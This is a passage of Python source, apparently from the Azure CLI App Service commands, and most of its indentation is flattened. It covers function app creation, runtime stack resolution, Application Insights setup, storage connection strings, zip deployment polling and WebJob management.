os = WINDOWS_OS_NAME if not linux else LINUX_OS_NAME
raise ValidationError("Invalid language type {} for OS {}".format(lang, os))
return versions[0]
# assumes non-java
def get_version_list(self, lang, linux=False, get_windows_config_version=False):
lang = lang.upper()
versions = []
for s in self.stacks:
if s.linux == linux:
l_name, v, *_ = s.display_name.upper().split("|")
if l_name == lang:
if get_windows_config_version:
versions.append(s.configs[self.windows_config_mappings[lang.lower()]])
else:
versions.append(v)
return versions
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack.configs.items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack.configs.items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
# format a (non-java) windows runtime display text
# TODO get API to return more CLI-friendly display text for windows stacks
@classmethod
def _format_windows_display_text(cls, display_text):
import re
t = display_text.upper()
t = t.replace(".NET CORE", NETCORE_RUNTIME_NAME.upper())
t = t.replace("ASP.NET", ASPDOTNET_RUNTIME_NAME.upper())
t = t.replace(".NET", DOTNET_RUNTIME_NAME)
t = re.sub(r"\(.*\)", "", t) # remove "(LTS)"
return t.replace(" ", "|", 1).replace(" ", "")
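    # Illustrative example (assumes ASPDOTNET_RUNTIME_NAME == 'aspnet'): a display text of
    # 'ASP.NET V4.8 (LTS)' becomes 'ASPNET V4.8 ' after the replacements, then 'ASPNET|V4.8'.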
@classmethod
def _is_valid_runtime_setting(cls, runtime_setting):
return runtime_setting is not None and not runtime_setting.is_hidden and not runtime_setting.is_deprecated
@classmethod
def _get_runtime_setting(cls, minor_version, linux, java):
if not linux:
if not java:
return minor_version.stack_settings.windows_runtime_settings
return minor_version.stack_settings.windows_container_settings
if not java:
return minor_version.stack_settings.linux_runtime_settings
return minor_version.stack_settings.linux_container_settings
@classmethod
def _get_valid_minor_versions(cls, major_version, linux, java=False):
def _filter(minor_version):
return cls._is_valid_runtime_setting(cls._get_runtime_setting(minor_version, linux, java))
return [m for m in major_version.minor_versions if _filter(m)]
def _parse_major_version_windows(self, major_version, parsed_results, config_mappings):
minor_java_versions = self._get_valid_minor_versions(major_version, linux=False, java=True)
default_java_version = next(iter(minor_java_versions), None)
if default_java_version:
container_settings = default_java_version.stack_settings.windows_container_settings
# TODO get the API to return java versions in a more parseable way
for java_version in ["1.8", "11"]:
java_container = container_settings.java_container
container_version = container_settings.java_container_version
if container_version.upper() == "SE":
java_container = "Java SE"
if java_version == "1.8":
container_version = "8"
else:
container_version = "11"
runtime_name = "{}|{}|{}|{}".format("java",
java_version,
java_container,
container_version)
gh_actions_version = "8" if java_version == "1.8" else java_version
gh_actions_runtime = "{}, {}, {}".format(java_version,
java_container.lower().replace(" se", ""),
container_settings.java_container_version.lower())
if java_container == "Java SE": # once runtime name is set, reset configs to correct values
java_container = "JAVA"
container_version = "SE"
runtime = self.Runtime(display_name=runtime_name,
configs={"java_version": java_version,
"java_container": java_container,
"java_container_version": container_version},
github_actions_properties={"github_actions_version": gh_actions_version,
"app_runtime": "java",
"app_runtime_version": gh_actions_runtime},
linux=False)
parsed_results.append(runtime)
else:
minor_versions = self._get_valid_minor_versions(major_version, linux=False, java=False)
for minor_version in minor_versions:
settings = minor_version.stack_settings.windows_runtime_settings
runtime_name = self._format_windows_display_text(minor_version.display_text)
runtime = self.Runtime(display_name=runtime_name, linux=False)
lang_name = runtime_name.split("|")[0].lower()
config_key = config_mappings.get(lang_name)
if config_key:
runtime.configs[config_key] = settings.runtime_version
gh_properties = settings.git_hub_action_settings
if gh_properties.is_supported:
runtime.github_actions_properties = {"github_actions_version": gh_properties.supported_version}
parsed_results.append(runtime)
def _parse_major_version_linux(self, major_version, parsed_results):
minor_java_versions = self._get_valid_minor_versions(major_version, linux=True, java=True)
default_java_version_linux = next(iter(minor_java_versions), None)
if default_java_version_linux:
linux_container_settings = default_java_version_linux.stack_settings.linux_container_settings
runtimes = [(linux_container_settings.java11_runtime, "11"), (linux_container_settings.java8_runtime, "8")]
for runtime_name, version in [(r, v) for (r, v) in runtimes if r is not None]:
runtime = self.Runtime(display_name=runtime_name,
configs={"linux_fx_version": runtime_name},
github_actions_properties={"github_actions_version": version},
linux=True,
)
parsed_results.append(runtime)
else:
minor_versions = self._get_valid_minor_versions(major_version, linux=True, java=False)
for minor_version in minor_versions:
settings = minor_version.stack_settings.linux_runtime_settings
runtime_name = settings.runtime_version
runtime = self.Runtime(display_name=runtime_name,
configs={"linux_fx_version": runtime_name},
linux=True,
)
gh_properties = settings.git_hub_action_settings
if gh_properties.is_supported:
runtime.github_actions_properties = {"github_actions_version": gh_properties.supported_version}
parsed_results.append(runtime)
# override _load_stacks() to call this method to use hardcoded stacks
def _load_stacks_hardcoded(self):
import os
stacks_file = os.path.abspath(os.path.join(os.path.abspath(__file__), '../resources/WebappRuntimeStacks.json'))
if self._stacks:
return
stacks = []
if self._linux:
stacks_json = get_file_json(stacks_file)['linux']
for r in stacks_json:
stacks.append(self.Runtime(display_name=r.get("displayName"),
configs=r.get("configs"),
github_actions_properties=r.get("github_actions_properties"),
linux=True))
if self._windows: # Windows stacks
stacks_json = get_file_json(stacks_file)['windows']
for r in stacks_json:
stacks.append(self.Runtime(display_name=r.get("displayName"),
configs=r.get("configs"),
github_actions_properties=r.get("github_actions_properties"),
linux=False))
self._stacks = stacks
class _FunctionAppStackRuntimeHelper(_AbstractStackRuntimeHelper):
# pylint: disable=too-few-public-methods,too-many-instance-attributes
class Runtime:
def __init__(self, name=None, version=None, is_preview=False, supported_func_versions=None, linux=False,
app_settings_dict=None, site_config_dict=None, app_insights=False, default=False):
self.name = name
self.version = version
self.is_preview = is_preview
self.supported_func_versions = [] if not supported_func_versions else supported_func_versions
self.linux = linux
self.app_settings_dict = dict() if not app_settings_dict else app_settings_dict
self.site_config_dict = dict() if not site_config_dict else site_config_dict
self.app_insights = app_insights
self.default = default
self.display_name = "{}|{}".format(name, version) if version else name
# used for displaying stacks
def to_dict(self):
return {"runtime": self.name,
"version": self.version,
"supported_functions_versions": self.supported_func_versions}
def __init__(self, cmd, linux=False, windows=False):
self.disallowed_functions_versions = {"~1", "~2"}
self.KEYS = FUNCTIONS_STACKS_API_KEYS()
super().__init__(cmd, linux=linux, windows=windows)
def resolve(self, runtime, version=None, functions_version=None, linux=False):
stacks = self.stacks
runtimes = [r for r in stacks if r.linux == linux and runtime == r.name]
os = LINUX_OS_NAME if linux else WINDOWS_OS_NAME
if not runtimes:
supported_runtimes = [r.name for r in stacks if r.linux == linux]
raise ValidationError("Runtime {0} not supported for os {1}. Supported runtimes for os {1} are: {2}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(runtime, os, supported_runtimes))
if version is None:
return self.get_default_version(runtime, functions_version, linux)
matched_runtime_version = next((r for r in runtimes if r.version == version), None)
if not matched_runtime_version:
# help convert previously acceptable versions into correct ones if match not found
old_to_new_version = {
"11": "11.0",
"8": "8.0"
}
new_version = old_to_new_version.get(version)
matched_runtime_version = next((r for r in runtimes if r.version == new_version), None)
if not matched_runtime_version:
versions = [r.version for r in runtimes]
raise ValidationError("Invalid version: {0} for runtime {1} and os {2}. Supported versions for runtime "
"{1} and os {2} are: {3}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(version, runtime, os, versions))
if functions_version not in matched_runtime_version.supported_func_versions:
supported_func_versions = matched_runtime_version.supported_func_versions
raise ValidationError("Functions version {} is not supported for runtime {} with version {} and os {}. "
"Supported functions versions are {}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(functions_version, runtime, version, os, supported_func_versions))
return matched_runtime_version
def get_default_version(self, runtime, functions_version, linux=False):
runtimes = [r for r in self.stacks if r.linux == linux and r.name == runtime]
runtimes.sort(key=lambda r: r.default, reverse=True) # make runtimes with default=True appear first
for r in runtimes:
if functions_version in r.supported_func_versions:
return r
raise ValidationError("Could not find a runtime version for runtime {} with functions version {} and os {}"
"Run 'az functionapp list-runtimes' for more details on supported runtimes. ")
def _get_raw_stacks_from_api(self):
return list(self._client.provider.get_function_app_stacks(stack_os_type=None))
# remove non-digit or non-"." chars
@classmethod
def _format_version_name(cls, name):
import re
return re.sub(r"[^\d\.]", "", name)
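    # Illustrative example (not executed): _format_version_name('~4') -> '4' and
    # _format_version_name('3.1 LTS') -> '3.1', since only digits and dots are kept.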
# format version names while maintaining uniqueness
def _format_version_names(self, runtime_to_version):
formatted_runtime_to_version = {}
for runtime, versions in runtime_to_version.items():
formatted_runtime_to_version[runtime] = formatted_runtime_to_version.get(runtime, dict())
for version_name, version_info in versions.items():
formatted_name = self._format_version_name(version_name)
if formatted_name in formatted_runtime_to_version[runtime]:
formatted_name = version_name.lower().replace(" ", "-")
formatted_runtime_to_version[runtime][formatted_name] = version_info
return formatted_runtime_to_version
@classmethod
def _format_function_version(cls, v):
return v.replace("~", "")
def _get_valid_function_versions(self, runtime_settings):
supported_function_versions = runtime_settings.supported_functions_extension_versions
valid_versions = []
for v in supported_function_versions:
if v not in self.disallowed_functions_versions:
valid_versions.append(self._format_version_name(v))
return valid_versions
def _parse_minor_version(self, runtime_settings, major_version_name, minor_version_name, runtime_to_version):
if not runtime_settings.is_deprecated:
functions_versions = self._get_valid_function_versions(runtime_settings)
if functions_versions:
runtime_version_properties = {
self.KEYS.IS_PREVIEW: runtime_settings.is_preview,
self.KEYS.SUPPORTED_EXTENSION_VERSIONS: functions_versions,
self.KEYS.APP_SETTINGS_DICT: runtime_settings.app_settings_dictionary,
self.KEYS.APPLICATION_INSIGHTS: runtime_settings.app_insights_settings.is_supported,
self.KEYS.SITE_CONFIG_DICT: runtime_settings.site_config_properties_dictionary,
self.KEYS.IS_DEFAULT: bool(runtime_settings.is_default),
}
runtime_name = (runtime_settings.app_settings_dictionary.get(self.KEYS.FUNCTIONS_WORKER_RUNTIME) or
major_version_name)
runtime_to_version[runtime_name] = runtime_to_version.get(runtime_name, dict())
runtime_to_version[runtime_name][minor_version_name] = runtime_version_properties
def _create_runtime_from_properties(self, runtime_name, version_name, version_properties, linux):
supported_func_versions = version_properties[self.KEYS.SUPPORTED_EXTENSION_VERSIONS]
return self.Runtime(name=runtime_name,
version=version_name,
is_preview=version_properties[self.KEYS.IS_PREVIEW],
supported_func_versions=supported_func_versions,
linux=linux,
site_config_dict=version_properties[self.KEYS.SITE_CONFIG_DICT],
app_settings_dict=version_properties[self.KEYS.APP_SETTINGS_DICT],
app_insights=version_properties[self.KEYS.APPLICATION_INSIGHTS],
default=version_properties[self.KEYS.IS_DEFAULT],
)
def _parse_raw_stacks(self, stacks):
# build a map of runtime -> runtime version -> runtime version properties
runtime_to_version_linux = {}
runtime_to_version_windows = {}
for runtime in stacks:
for major_version in runtime.major_versions:
for minor_version in major_version.minor_versions:
runtime_version = minor_version.value
linux_settings = minor_version.stack_settings.linux_runtime_settings
windows_settings = minor_version.stack_settings.windows_runtime_settings
if linux_settings is not None:
self._parse_minor_version(runtime_settings=linux_settings,
major_version_name=runtime.name,
minor_version_name=runtime_version,
runtime_to_version=runtime_to_version_linux)
if windows_settings is not None:
self._parse_minor_version(runtime_settings=windows_settings,
major_version_name=runtime.name,
minor_version_name=runtime_version,
runtime_to_version=runtime_to_version_windows)
runtime_to_version_linux = self._format_version_names(runtime_to_version_linux)
runtime_to_version_windows = self._format_version_names(runtime_to_version_windows)
for runtime_name, versions in runtime_to_version_windows.items():
for version_name, version_properties in versions.items():
r = self._create_runtime_from_properties(runtime_name, version_name, version_properties, linux=False)
self._stacks.append(r)
for runtime_name, versions in runtime_to_version_linux.items():
for version_name, version_properties in versions.items():
r = self._create_runtime_from_properties(runtime_name, version_name, version_properties, linux=True)
self._stacks.append(r)
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise ResourceNotFoundError("App Insights {} under resource group {} was not found.".format(name,
resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku, number_of_workers=None,
max_burst=None, location=None, tags=None, zone_redundant=False):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_tier(sku)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
"be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
functions_version = '3'
if deployment_source_url and deployment_local_git:
raise MutuallyExclusiveArgumentError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise MutuallyExclusiveArgumentError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
from azure.mgmt.web.models import Site
SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
client = web_client_factory(cmd.cli_ctx)
if vnet or subnet:
if plan:
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
webapp_location = plan_info.location
else:
webapp_location = consumption_plan_location
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
vnet_sub_id=subnet_info["subnet_subscription_id"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
functionapp_def = Site(location=None, site_config=site_config, tags=tags,
virtual_network_subnet_id=subnet_resource_id)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise ValidationError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = bool(os_type and os_type.lower() == LINUX_OS_NAME)
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = bool(plan_info.reserved)
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise ValidationError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise ArgumentUsageError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
if runtime is None and runtime_version is not None:
raise ArgumentUsageError('Must specify --runtime to use --runtime-version')
runtime_helper = _FunctionAppStackRuntimeHelper(cmd, linux=is_linux, windows=(not is_linux))
matched_runtime = runtime_helper.resolve("dotnet" if not runtime else runtime,
runtime_version, functions_version, is_linux)
site_config_dict = matched_runtime.site_config_dict
app_settings_dict = matched_runtime.app_settings_dict
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_dict.use32_bit_worker_process = False
app_settings_dict = {}
# ensure that app insights is created if not disabled
matched_runtime.app_insights = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_dict.as_dict().items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_dict.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not matched_runtime.app_insights:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and matched_runtime.app_insights:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
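# Illustrative example (not executed): _convert_camel_to_snake_case('linuxFxVersion')
# returns 'linux_fx_version', matching the snake_case attribute names set on the site config.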
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
    # the content share name should be up to 63 characters long, made of lowercase letters and digits, and random,
    # so take the first 50 characters of the app name and append the last 12 hex characters of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
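# Illustrative example (not executed): for an app named 'MyFunctionApp' the share name is
# 'myfunctionapp' plus the last 12 hex characters of a fresh uuid4, e.g. 'myfunctionapp4f9c2d7a1b3e'.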
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # We emit this success message as a warning so it does not interfere with the regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS'] # pylint: disable=line-too-long
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
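# For reference, the returned connection string has this shape (values illustrative only):
# 'DefaultEndpointsProtocol=https;EndpointSuffix=core.windows.net;AccountName=mystorage;AccountKey=<key1>'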
def list_consumption_locations(cmd):
# Temporary fix due to regression in this specific API with 2021-03-01, should be removed with the next SDK update
client = web_client_factory(cmd.cli_ctx, api_version='2020-09-01')
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx, api_version="2020-09-01")
full_sku = get_sku_tier(sku)
# Temporary fix due to regression in this specific API with 2021-03-01, should be removed with the next SDK update
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
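# Note on the polling loop above: in the deployment status payload, 'status' == 3 marks a
# failed deployment (hence the raise) and 'status' == 4 marks success (hence the break).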
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
